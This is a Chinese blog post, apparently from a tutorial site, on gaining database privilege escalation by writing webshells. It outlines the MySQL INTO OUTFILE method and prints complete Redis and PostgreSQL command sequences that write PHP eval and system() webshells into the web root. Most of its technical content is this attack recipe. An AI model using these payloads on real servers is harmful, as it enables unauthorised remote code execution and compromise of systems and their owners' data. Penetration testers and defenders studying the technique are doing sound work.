数据库提权--写马

前言

写马提权其实跟UDF提权很像,两者的利用条件差不多,不过写马提权操作步骤比UDF提权要简单一些。

相同点:

1、secure_file_priv 都不能为null

2、都要导入文件到目标服务器中

3、都要知道绝对路径

4、都要root权限

不同点:

1、写马提权知道网站绝对路径是为了后续连接木马,UDF提权知道绝对路径是为了将DLL文件写入到目标服务器

2、两者导入的文件类型不同,写马提权导入的文件是服务器可以解析的木马文件,UDF提权只能是DLL文件

实操 

 1、写入木马

通过into dumpfile或者into outfile 将一句话木马写入到目标服务器。在箭头指向处就是木马的连接地址。

2、验证木马写入成功

3、使用蚁剑连接木马文件

总结

本文只是针对MySQL数据库写马进行了实操训练,redis数据库以及PostgreSQL数据库也可以通过写马进行提权。

redis数据库的webshell代码为:

config set dir /var/www/html/ # 网站根路径

config set dbfilename shell.php

set 1 "<?php @eval($_POST['123']);?>"

save

 

PostgreSQL的webshell代码为:

drop table pwn;

create table pwn (t TEXT);

insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');

select * from pwn;

copy pwn(t) to '/var/www/html/cmd.php';

drop table pwn;

copy (select '<?php phpinfo();?>') to '/var/www/html/cmd.php'; 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

春天里面的龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值